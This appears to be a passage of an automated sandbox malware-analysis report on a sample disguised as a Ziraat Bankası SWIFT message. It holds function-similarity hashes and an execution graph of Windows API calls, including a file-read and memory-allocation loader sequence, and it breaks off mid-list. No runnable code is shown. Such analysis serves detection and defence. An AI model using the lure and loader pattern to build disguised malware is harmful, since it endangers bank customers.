                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 3850602802-1403004172
                                                                                                                                                        • Opcode ID: 33c0bb15c980b923fe8fd9a67549a876e929592968120813b2c07051a3b813f5
                                                                                                                                                        • Instruction ID: e5a49fa948c5d1d85e80523f94c8477e4095f948bf8398e064651b57c114d426
                                                                                                                                                        • Opcode Fuzzy Hash: 33c0bb15c980b923fe8fd9a67549a876e929592968120813b2c07051a3b813f5
                                                                                                                                                        • Instruction Fuzzy Hash: 73016D75641108ABDB14FBA4D953EFE73B8AF05344F14002AB542B3292EBA49E1897B5
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 000BB76C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 3850602802-1403004172
                                                                                                                                                        • Opcode ID: 1e3fbdff4c81d0e0398395a282cea2f6279b208bef7637ebc9c15c833f457409
                                                                                                                                                        • Instruction ID: 18a260a9501a65aee4cd92e03190f584c5beaca7fb611b2a0c22c7438b19e15f
                                                                                                                                                        • Opcode Fuzzy Hash: 1e3fbdff4c81d0e0398395a282cea2f6279b208bef7637ebc9c15c833f457409
                                                                                                                                                        • Instruction Fuzzy Hash: 6701AD75680104ABDB10FBA4D902EFE73ECAF05344F14001AB442B3292EFB05E0987B5
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                                                        • String ID: #32770
                                                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                                                        • Opcode ID: d6cbe667146079d32a850442af03170c1660fc3ab8bc2c06ca0ec9a92bae1fd2
                                                                                                                                                        • Instruction ID: b856e5fc049ea7eae3c4d7ac830043b4b8b35e00cd26ff026196121a49a86ee0
                                                                                                                                                        • Opcode Fuzzy Hash: d6cbe667146079d32a850442af03170c1660fc3ab8bc2c06ca0ec9a92bae1fd2
                                                                                                                                                        • Instruction Fuzzy Hash: CEE092B7A042286BD710ABE5EC0AECBFBACAB55764F00011AB915E3081D660A74187D4
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 000CAC6A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$SystemVariant__swprintf
                                                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                        • API String ID: 3499402700-1568723262
                                                                                                                                                        • Opcode ID: 5851db94fea2c0d6006fa599198590250f26100490abaee83f33d22808fe6134
                                                                                                                                                        • Instruction ID: 6512f993bb9f0b85209edf539d9e8599682d17afbcc3b95cbafaebe390232883
                                                                                                                                                        • Opcode Fuzzy Hash: 5851db94fea2c0d6006fa599198590250f26100490abaee83f33d22808fe6134
                                                                                                                                                        • Instruction Fuzzy Hash: 42F0AC92900228A9CF64ABD98C45EFEB7FCAB0D701F014456F985E1082E63CDD80D735
                                                                                                                                                        APIs
                                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000BA63F
                                                                                                                                                          • Part of subcall function 000A13F1: _doexit.LIBCMT ref: 000A13FB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message_doexit
                                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                                                        • Opcode ID: 2d23e5cf62b3bf1488d81d2c0376dd985b106ed1b8c89da8ede886efd1e2277d
                                                                                                                                                        • Instruction ID: 0310d4931c524660823bc1d9b52d02060c464a59cfc94a2e61c8ee0cd8fdec87
                                                                                                                                                        • Opcode Fuzzy Hash: 2d23e5cf62b3bf1488d81d2c0376dd985b106ed1b8c89da8ede886efd1e2277d
                                                                                                                                                        • Instruction Fuzzy Hash: 5DD05B323C472833D61436D87C17FD576489B16B55F044065FB48955C34EE3968052D9

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:5.5%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:1.3%
                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                        Total number of Nodes:1521
                                                                                                                                                        Total number of Limit Nodes:59
                                                                                                                                                        execution_graph 54161 15d2378 54177 15cffa8 54161->54177 54163 15d2435 54180 15d2268 54163->54180 54165 15d245e CreateFileW 54167 15d24ad 54165->54167 54168 15d24b2 54165->54168 54168->54167 54169 15d24c9 VirtualAlloc 54168->54169 54169->54167 54170 15d24ea ReadFile 54169->54170 54170->54167 54171 15d2505 54170->54171 54172 15d1018 7 API calls 54171->54172 54173 15d251f 54172->54173 54174 15d1268 13 API calls 54173->54174 54175 15d2552 54174->54175 54176 15d2575 ExitProcess 54175->54176 54176->54167 54183 15d3478 GetPEB 54177->54183 54179 15d0633 54179->54163 54181 15d2271 Sleep 54180->54181 54182 15d227f 54181->54182 54184 15d34a2 54183->54184 54184->54179 54185 90a635 54190 90a66f 54185->54190 54193 90a642 54185->54193 54186 90a671 54226 8dec4e 81 API calls 54186->54226 54187 90a676 54196 8c936c 54187->54196 54191 90a67d 54216 8c510d 54191->54216 54193->54186 54193->54187 54193->54190 54194 90a669 54193->54194 54225 8d4525 49 API calls ___crtGetEnvironmentStringsW 54194->54225 54197 8c9384 54196->54197 54211 8c9380 54196->54211 54198 8c93b0 __itow _wcscpy 54197->54198 54199 934cbd __i64tow 54197->54199 54200 8c9398 54197->54200 54201 934bbf 54197->54201 54228 8df4ea 54198->54228 54227 8e172b 80 API calls 3 library calls 54200->54227 54202 934ca5 54201->54202 54203 934bc8 54201->54203 54243 8e172b 80 API calls 3 library calls 54202->54243 54203->54198 54208 934be7 54203->54208 54207 8c93ba 54207->54211 54237 8cce19 54207->54237 54210 8df4ea 48 API calls 54208->54210 54212 934c04 54210->54212 54211->54191 54213 8df4ea 48 API calls 54212->54213 54214 934c2a 54213->54214 54214->54211 54215 8cce19 48 API calls 54214->54215 54215->54211 54217 8c511f 54216->54217 54218 931be7 54216->54218 54277 8cb384 54217->54277 54286 8fa58f 48 API calls ___crtGetEnvironmentStringsW 54218->54286 54221 8c512b 54221->54190 54222 931bf1 54287 8c6eed 48 API calls 54222->54287 54224 931bf9 54225->54190 54226->54187 54227->54198 54231 8df4f2 __calloc_impl 54228->54231 54230 8df50c 54230->54207 54231->54230 54232 8df50e std::exception::exception 54231->54232 54244 8e395c 54231->54244 54258 8e6805 RaiseException 54232->54258 54234 8df538 54259 8e673b 47 API calls _free 54234->54259 54236 8df54a 54236->54207 54238 8cce28 __wsetenvp 54237->54238 54266 8dee75 54238->54266 54240 8cce50 ___crtGetEnvironmentStringsW 54241 8df4ea 48 API calls 54240->54241 54242 8cce66 54241->54242 54242->54211 54243->54198 54245 8e39d7 __calloc_impl 54244->54245 54248 8e3968 __calloc_impl 54244->54248 54265 8e7c0e 47 API calls __getptd_noexit 54245->54265 54246 8e3973 54246->54248 54260 8e81c2 47 API calls 2 library calls 54246->54260 54261 8e821f 47 API calls 7 library calls 54246->54261 54262 8e1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 54246->54262 54248->54246 54250 8e399b RtlAllocateHeap 54248->54250 54253 8e39c3 54248->54253 54256 8e39c1 54248->54256 54250->54248 54252 8e39cf 54250->54252 54252->54231 54263 8e7c0e 47 API calls __getptd_noexit 54253->54263 54264 8e7c0e 47 API calls __getptd_noexit 54256->54264 54258->54234 54259->54236 54260->54246 54261->54246 54263->54256 54264->54252 54265->54252 54268 8df4ea __calloc_impl 54266->54268 54267 8e395c _W_store_winword 47 API calls 54267->54268 54268->54267 54269 8df50c 54268->54269 54270 8df50e std::exception::exception 54268->54270 54269->54240 54275 8e6805 RaiseException 54270->54275 54272 8df538 54276 8e673b 47 API calls _free 54272->54276 54274 8df54a 54274->54240 54275->54272 54276->54274 54278 8cb392 54277->54278 54285 8cb3c5 ___crtGetEnvironmentStringsW 54277->54285 54279 8cb3fd 54278->54279 54280 8cb3b8 54278->54280 54278->54285 54281 8df4ea 48 API calls 54279->54281 54288 8cbb85 54280->54288 54283 8cb407 54281->54283 54284 8df4ea 48 API calls 54283->54284 54284->54285 54285->54221 54286->54222 54287->54224 54289 8cbb9b 54288->54289 54291 8cbb96 ___crtGetEnvironmentStringsW 54288->54291 54290 8dee75 48 API calls 54289->54290 54292 931b77 54289->54292 54290->54291 54291->54285 54292->54292 54293 8cecc5 54294 8cec8a 54293->54294 54315 8ce920 Mailbox 54294->54315 54332 90cc5c 86 API calls 3 library calls 54294->54332 54296 8ce94c PeekMessageW 54296->54315 54298 8ced21 PeekMessageW 54298->54315 54299 8cebc7 54302 8cedae timeGetTime 54329 8c1caa 49 API calls 54302->54329 54303 8ced3a TranslateMessage DispatchMessageW 54303->54298 54304 8cebf7 timeGetTime 54304->54315 54306 8df4ea 48 API calls 54306->54315 54307 935420 54309 935445 Sleep 54307->54309 54310 935429 54307->54310 54309->54299 54310->54309 54311 935432 Sleep 54310->54311 54311->54309 54314 8cce19 48 API calls 54314->54315 54315->54296 54315->54298 54315->54299 54315->54302 54315->54303 54315->54304 54315->54306 54315->54307 54315->54314 54316 8cd6e9 55 API calls 54315->54316 54317 8de244 54315->54317 54322 8ddc5f 54315->54322 54327 8ceed0 94 API calls Mailbox 54315->54327 54328 8cef00 88 API calls 54315->54328 54330 928d23 48 API calls 54315->54330 54331 8c1caa 49 API calls 54315->54331 54316->54315 54318 93df42 54317->54318 54319 8de253 54317->54319 54320 93df77 54318->54320 54321 93df59 TranslateAcceleratorW 54318->54321 54319->54315 54321->54319 54323 8ddca3 54322->54323 54326 8ddc71 54322->54326 54323->54315 54324 8ddc96 IsDialogMessageW 54324->54323 54324->54326 54325 93dd1d GetClassLongW 54325->54324 54325->54326 54326->54323 54326->54324 54326->54325 54327->54315 54328->54315 54329->54315 54330->54315 54331->54315 54332->54315 54333 8c4166 54347 8c41a9 54333->54347 54336 8c417a 54338 9334aa 54336->54338 54339 8c4186 54336->54339 54337 933489 54371 90c396 54337->54371 54413 906b49 87 API calls _wprintf 54338->54413 54406 8cc833 162 API calls 6 library calls 54339->54406 54344 8c419e 54345 9334b8 54414 8c4214 54347->54414 54352 934f73 54355 8c4252 84 API calls 54352->54355 54353 8c41d4 LoadLibraryExW 54424 8c4291 54353->54424 54357 934f7a 54355->54357 54359 8c4291 3 API calls 54357->54359 54361 934f82 54359->54361 54360 8c41fb 54360->54361 54362 8c4207 54360->54362 54450 8c44ed 54361->54450 54364 8c4252 84 API calls 54362->54364 54366 8c4172 54364->54366 54366->54336 54366->54337 54368 934fa9 54458 8c4950 54368->54458 54372 8c4517 83 API calls 54371->54372 54373 90c405 54372->54373 55019 90c56d 54373->55019 54376 8c44ed 64 API calls 54377 90c432 54376->54377 54378 8c44ed 64 API calls 54377->54378 54379 90c442 54378->54379 54380 8c44ed 64 API calls 54379->54380 54381 90c45d 54380->54381 54382 8c44ed 64 API calls 54381->54382 54383 90c478 54382->54383 54384 8c4517 83 API calls 54383->54384 54385 90c48f 54384->54385 54386 8e395c _W_store_winword 47 API calls 54385->54386 54387 90c496 54386->54387 54388 8e395c _W_store_winword 47 API calls 54387->54388 54389 90c4a0 54388->54389 54390 8c44ed 64 API calls 54389->54390 54391 90c4b4 54390->54391 54392 90bf5a GetSystemTimeAsFileTime 54391->54392 54393 90c4c7 54392->54393 54394 90c4f1 54393->54394 54395 90c4dc 54393->54395 54397 90c556 54394->54397 54398 90c4f7 54394->54398 54396 8e1c9d _free 47 API calls 54395->54396 54399 90c4e2 54396->54399 54401 8e1c9d _free 47 API calls 54397->54401 55025 90b965 118 API calls __fcloseall 54398->55025 54402 8e1c9d _free 47 API calls 54399->54402 54404 90c41b 54401->54404 54402->54404 54403 90c54e 54405 8e1c9d _free 47 API calls 54403->54405 54407 8c4252 54404->54407 54405->54404 54406->54344 54408 8c425c 54407->54408 54409 8c4263 54407->54409 55026 8e35e4 54408->55026 54411 8c4272 54409->54411 54412 8c4283 FreeLibrary 54409->54412 54411->54338 54412->54411 54413->54345 54463 8c4339 54414->54463 54417 8c423c 54419 8c41bb 54417->54419 54420 8c4244 FreeLibrary 54417->54420 54421 8e3499 54419->54421 54420->54419 54471 8e34ae 54421->54471 54423 8c41c8 54423->54352 54423->54353 54930 8c42e4 54424->54930 54428 8c41ec 54431 8c4380 54428->54431 54429 8c42c1 FreeLibrary 54429->54428 54430 8c42b8 54430->54428 54430->54429 54432 8df4ea 48 API calls 54431->54432 54433 8c4395 54432->54433 54938 8c47b7 54433->54938 54435 8c43a1 ___crtGetEnvironmentStringsW 54436 8c43dc 54435->54436 54437 8c4499 54435->54437 54438 8c44d1 54435->54438 54439 8c4950 57 API calls 54436->54439 54941 8c406b CreateStreamOnHGlobal 54437->54941 54952 90c750 93 API calls 54438->54952 54447 8c43e5 54439->54447 54442 8c44ed 64 API calls 54442->54447 54443 8c4479 54443->54360 54445 934ed7 54446 8c4517 83 API calls 54445->54446 54448 934eeb 54446->54448 54447->54442 54447->54443 54447->54445 54947 8c4517 54447->54947 54449 8c44ed 64 API calls 54448->54449 54449->54443 54451 934fc0 54450->54451 54452 8c44ff 54450->54452 54976 8e381e 54452->54976 54455 90bf5a 54996 90bdb4 54455->54996 54457 90bf70 54457->54368 54459 935002 54458->54459 54460 8c495f 54458->54460 55001 8e3e65 54460->55001 54462 8c4967 54467 8c434b 54463->54467 54466 8c4321 LoadLibraryA GetProcAddress 54466->54417 54468 8c422f 54467->54468 54469 8c4354 LoadLibraryA 54467->54469 54468->54417 54468->54466 54469->54468 54470 8c4365 GetProcAddress 54469->54470 54470->54468 54474 8e34ba _fseek 54471->54474 54472 8e34cd 54519 8e7c0e 47 API calls __getptd_noexit 54472->54519 54474->54472 54476 8e34fe 54474->54476 54475 8e34d2 54520 8e6e10 8 API calls __mbschr_l 54475->54520 54490 8ee4c8 54476->54490 54479 8e3503 54480 8e350c 54479->54480 54481 8e3519 54479->54481 54521 8e7c0e 47 API calls __getptd_noexit 54480->54521 54483 8e3543 54481->54483 54484 8e3523 54481->54484 54504 8ee5e0 54483->54504 54522 8e7c0e 47 API calls __getptd_noexit 54484->54522 54487 8e34dd _fseek @_EH4_CallFilterFunc@8 54487->54423 54491 8ee4d4 _fseek 54490->54491 54524 8e7cf4 54491->54524 54493 8ee4e2 54494 8ee559 54493->54494 54502 8ee552 54493->54502 54534 8e7d7c 54493->54534 54558 8e4e5b 48 API calls __lock 54493->54558 54559 8e4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 54493->54559 54560 8e69d0 47 API calls _W_store_winword 54494->54560 54497 8ee560 54499 8ee56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 54497->54499 54497->54502 54498 8ee5cc _fseek 54498->54479 54499->54502 54531 8ee5d7 54502->54531 54513 8ee600 __wopenfile 54504->54513 54505 8ee61a 54579 8e7c0e 47 API calls __getptd_noexit 54505->54579 54506 8ee7d5 54506->54505 54510 8ee838 54506->54510 54508 8ee61f 54580 8e6e10 8 API calls __mbschr_l 54508->54580 54576 8f63c9 54510->54576 54511 8e354e 54523 8e3570 LeaveCriticalSection LeaveCriticalSection _fseek 54511->54523 54513->54505 54513->54506 54581 8e185b 59 API calls 2 library calls 54513->54581 54515 8ee7ce 54515->54506 54582 8e185b 59 API calls 2 library calls 54515->54582 54517 8ee7ed 54517->54506 54583 8e185b 59 API calls 2 library calls 54517->54583 54519->54475 54520->54487 54521->54487 54522->54487 54523->54487 54525 8e7d18 EnterCriticalSection 54524->54525 54526 8e7d05 54524->54526 54525->54493 54527 8e7d7c __mtinitlocknum 46 API calls 54526->54527 54528 8e7d0b 54527->54528 54528->54525 54561 8e115b 47 API calls 3 library calls 54528->54561 54562 8e7e58 LeaveCriticalSection 54531->54562 54533 8ee5de 54533->54498 54535 8e7d88 _fseek 54534->54535 54536 8e7da9 54535->54536 54537 8e7d91 54535->54537 54538 8e7da7 54536->54538 54544 8e7e11 _fseek 54536->54544 54563 8e81c2 47 API calls 2 library calls 54537->54563 54538->54536 54566 8e69d0 47 API calls _W_store_winword 54538->54566 54541 8e7d96 54564 8e821f 47 API calls 7 library calls 54541->54564 54542 8e7dbd 54545 8e7dc4 54542->54545 54546 8e7dd3 54542->54546 54544->54493 54567 8e7c0e 47 API calls __getptd_noexit 54545->54567 54549 8e7cf4 __lock 46 API calls 54546->54549 54547 8e7d9d 54565 8e1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 54547->54565 54552 8e7dda 54549->54552 54551 8e7dc9 54551->54544 54553 8e7dfe 54552->54553 54554 8e7de9 InitializeCriticalSectionAndSpinCount 54552->54554 54568 8e1c9d 54553->54568 54555 8e7e04 54554->54555 54574 8e7e1a LeaveCriticalSection _doexit 54555->54574 54558->54493 54559->54493 54560->54497 54562->54533 54563->54541 54564->54547 54566->54542 54567->54551 54569 8e1ca6 RtlFreeHeap 54568->54569 54573 8e1ccf _free 54568->54573 54570 8e1cbb 54569->54570 54569->54573 54575 8e7c0e 47 API calls __getptd_noexit 54570->54575 54572 8e1cc1 GetLastError 54572->54573 54573->54555 54574->54544 54575->54572 54584 8f5bb1 54576->54584 54578 8f63e2 54578->54511 54579->54508 54580->54511 54581->54515 54582->54517 54583->54506 54587 8f5bbd _fseek 54584->54587 54585 8f5bcf 54671 8e7c0e 47 API calls __getptd_noexit 54585->54671 54587->54585 54589 8f5c06 54587->54589 54588 8f5bd4 54672 8e6e10 8 API calls __mbschr_l 54588->54672 54595 8f5c78 54589->54595 54592 8f5c23 54673 8f5c4c LeaveCriticalSection __unlock_fhandle 54592->54673 54593 8f5bde _fseek 54593->54578 54596 8f5c98 54595->54596 54674 8e273b 54596->54674 54598 8f5deb 54706 8e6e20 IsProcessorFeaturePresent 54598->54706 54601 8f5cb4 54601->54598 54602 8f5cee 54601->54602 54609 8f5d11 54601->54609 54712 8e7bda 47 API calls __getptd_noexit 54602->54712 54603 8f5bb1 __wsopen_helper 104 API calls 54605 8f63e2 54603->54605 54605->54592 54606 8f5cf3 54713 8e7c0e 47 API calls __getptd_noexit 54606->54713 54608 8f5d00 54714 8e6e10 8 API calls __mbschr_l 54608->54714 54610 8f5dcf 54609->54610 54618 8f5dad 54609->54618 54715 8e7bda 47 API calls __getptd_noexit 54610->54715 54613 8f5d0a 54613->54592 54614 8f5dd4 54716 8e7c0e 47 API calls __getptd_noexit 54614->54716 54616 8f5de1 54717 8e6e10 8 API calls __mbschr_l 54616->54717 54681 8ea979 54618->54681 54620 8f5e7b 54621 8f5ea6 54620->54621 54622 8f5e85 54620->54622 54699 8f5b20 54621->54699 54718 8e7bda 47 API calls __getptd_noexit 54622->54718 54625 8f5e8a 54719 8e7c0e 47 API calls __getptd_noexit 54625->54719 54627 8f5f46 GetFileType 54630 8f5f93 54627->54630 54631 8f5f51 GetLastError 54627->54631 54628 8f5f14 GetLastError 54721 8e7bed 47 API calls 3 library calls 54628->54721 54629 8f5e94 54720 8e7c0e 47 API calls __getptd_noexit 54629->54720 54725 8eac0b 48 API calls 2 library calls 54630->54725 54723 8e7bed 47 API calls 3 library calls 54631->54723 54636 8f5b20 ___createFile 3 API calls 54639 8f5f09 54636->54639 54637 8f5f39 54722 8e7c0e 47 API calls __getptd_noexit 54637->54722 54638 8f5f78 CloseHandle 54638->54637 54641 8f5f86 54638->54641 54639->54627 54639->54628 54724 8e7c0e 47 API calls __getptd_noexit 54641->54724 54642 8f5fb1 54646 8f616c 54642->54646 54667 8f6032 54642->54667 54726 8ef82f 49 API calls 3 library calls 54642->54726 54645 8f5f8b 54645->54637 54646->54598 54648 8f633f CloseHandle 54646->54648 54650 8f5b20 ___createFile 3 API calls 54648->54650 54649 8f601b 54669 8f603a 54649->54669 54727 8e7bda 47 API calls __getptd_noexit 54649->54727 54652 8f6366 54650->54652 54651 8eee0e 59 API calls __wsopen_helper 54651->54669 54654 8f636e GetLastError 54652->54654 54655 8f61f6 54652->54655 54770 8e7bed 47 API calls 3 library calls 54654->54770 54655->54598 54658 8ef82f 49 API calls __lseeki64_nolock 54658->54669 54659 8f637a 54771 8eab1e 48 API calls 2 library calls 54659->54771 54662 8ef82f 49 API calls __lseeki64_nolock 54662->54667 54664 8f61e9 54666 8eea9c __close_nolock 50 API calls 54664->54666 54665 8f61d2 54665->54646 54668 8f61f0 54666->54668 54667->54646 54667->54662 54667->54669 54745 8eaf61 54667->54745 54744 8e7c0e 47 API calls __getptd_noexit 54668->54744 54669->54651 54669->54658 54669->54664 54669->54665 54669->54667 54728 8eea9c 54669->54728 54743 8f6f40 81 API calls 4 library calls 54669->54743 54671->54588 54672->54593 54673->54593 54675 8e275a 54674->54675 54676 8e2745 54674->54676 54675->54601 54772 8e7c0e 47 API calls __getptd_noexit 54676->54772 54678 8e274a 54773 8e6e10 8 API calls __mbschr_l 54678->54773 54680 8e2755 54680->54601 54682 8ea985 _fseek 54681->54682 54683 8e7d7c __mtinitlocknum 47 API calls 54682->54683 54684 8ea996 54683->54684 54685 8e7cf4 __lock 47 API calls 54684->54685 54686 8ea99b _fseek 54684->54686 54695 8ea9a9 54685->54695 54686->54620 54687 8eaaf3 54790 8eab15 LeaveCriticalSection _doexit 54687->54790 54688 8eaa85 54775 8e6986 54688->54775 54691 8e7cf4 __lock 47 API calls 54691->54695 54692 8eaa25 EnterCriticalSection 54694 8eaa35 LeaveCriticalSection 54692->54694 54692->54695 54694->54695 54695->54687 54695->54688 54695->54691 54695->54692 54696 8eaa03 InitializeCriticalSectionAndSpinCount 54695->54696 54774 8eaa4d LeaveCriticalSection _doexit 54695->54774 54696->54695 54700 8f5b2c ___crtMessageBoxW 54699->54700 54701 8f5b30 GetModuleHandleW GetProcAddress 54700->54701 54704 8f5b52 ___crtMessageBoxW 54700->54704 54702 8f5b4d 54701->54702 54701->54704 54703 8f5b61 54702->54703 54703->54627 54703->54628 54703->54636 54704->54703 54705 8f5b93 CreateFileW 54704->54705 54705->54703 54707 8e6e2b 54706->54707 54799 8e6cb5 54707->54799 54711 8e6e46 54711->54603 54712->54606 54713->54608 54714->54613 54715->54614 54716->54616 54717->54598 54718->54625 54719->54629 54720->54613 54721->54637 54722->54598 54723->54638 54724->54645 54725->54642 54726->54649 54727->54667 54815 8eaba4 54728->54815 54730 8eeb00 54828 8eab1e 48 API calls 2 library calls 54730->54828 54732 8eeaaa 54732->54730 54733 8eeade 54732->54733 54736 8eaba4 __chsize_nolock 47 API calls 54732->54736 54733->54730 54734 8eaba4 __chsize_nolock 47 API calls 54733->54734 54737 8eeaea CloseHandle 54734->54737 54735 8eeb08 54738 8eeb2a 54735->54738 54829 8e7bed 47 API calls 3 library calls 54735->54829 54739 8eead5 54736->54739 54737->54730 54740 8eeaf6 GetLastError 54737->54740 54738->54669 54742 8eaba4 __chsize_nolock 47 API calls 54739->54742 54740->54730 54742->54733 54743->54669 54744->54655 54746 8eaf6d _fseek 54745->54746 54747 8eaf8d 54746->54747 54748 8eaf75 54746->54748 54750 8eb022 54747->54750 54754 8eafbf 54747->54754 54899 8e7bda 47 API calls __getptd_noexit 54748->54899 54904 8e7bda 47 API calls __getptd_noexit 54750->54904 54751 8eaf7a 54900 8e7c0e 47 API calls __getptd_noexit 54751->54900 54757 8ea8ed ___lock_fhandle 49 API calls 54754->54757 54755 8eb027 54905 8e7c0e 47 API calls __getptd_noexit 54755->54905 54756 8eaf82 _fseek 54756->54667 54759 8eafc5 54757->54759 54761 8eafeb 54759->54761 54762 8eafd8 54759->54762 54760 8eb02f 54906 8e6e10 8 API calls __mbschr_l 54760->54906 54901 8e7c0e 47 API calls __getptd_noexit 54761->54901 54835 8eb043 54762->54835 54766 8eaff0 54902 8e7bda 47 API calls __getptd_noexit 54766->54902 54767 8eafe4 54903 8eb01a LeaveCriticalSection __unlock_fhandle 54767->54903 54770->54659 54771->54655 54772->54678 54773->54680 54774->54695 54778 8e698d 54775->54778 54777 8e69ca 54777->54687 54781 8ea8ed 54777->54781 54778->54777 54779 8e69ab Sleep 54778->54779 54791 8f30aa 54778->54791 54780 8e69c2 54779->54780 54780->54777 54780->54778 54782 8ea8f9 _fseek 54781->54782 54783 8ea946 EnterCriticalSection 54782->54783 54784 8e7cf4 __lock 47 API calls 54782->54784 54785 8ea96c _fseek 54783->54785 54786 8ea91d 54784->54786 54785->54687 54787 8ea93a 54786->54787 54788 8ea928 InitializeCriticalSectionAndSpinCount 54786->54788 54798 8ea970 LeaveCriticalSection _doexit 54787->54798 54788->54787 54790->54686 54792 8f30b5 54791->54792 54793 8f30d0 __calloc_impl 54791->54793 54792->54793 54794 8f30c1 54792->54794 54795 8f30e0 HeapAlloc 54793->54795 54797 8f30c6 54793->54797 54796 8e7c0e __mbschr_l 46 API calls 54794->54796 54795->54793 54795->54797 54796->54797 54797->54778 54798->54783 54800 8e6ccf _memset ___raise_securityfailure 54799->54800 54801 8e6cef IsDebuggerPresent 54800->54801 54807 8e81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 54801->54807 54804 8e6dd6 54806 8e8197 GetCurrentProcess TerminateProcess 54804->54806 54805 8e6db3 ___raise_securityfailure 54808 8ea70c 54805->54808 54806->54711 54807->54805 54809 8ea716 IsProcessorFeaturePresent 54808->54809 54810 8ea714 54808->54810 54812 8f37b0 54809->54812 54810->54804 54813 8f375f ___raise_securityfailure 5 API calls 54812->54813 54814 8f3893 54813->54814 54814->54804 54816 8eabaf 54815->54816 54817 8eabc4 54815->54817 54830 8e7bda 47 API calls __getptd_noexit 54816->54830 54822 8eabe9 54817->54822 54832 8e7bda 47 API calls __getptd_noexit 54817->54832 54820 8eabb4 54831 8e7c0e 47 API calls __getptd_noexit 54820->54831 54822->54732 54823 8eabf3 54833 8e7c0e 47 API calls __getptd_noexit 54823->54833 54825 8eabbc 54825->54732 54826 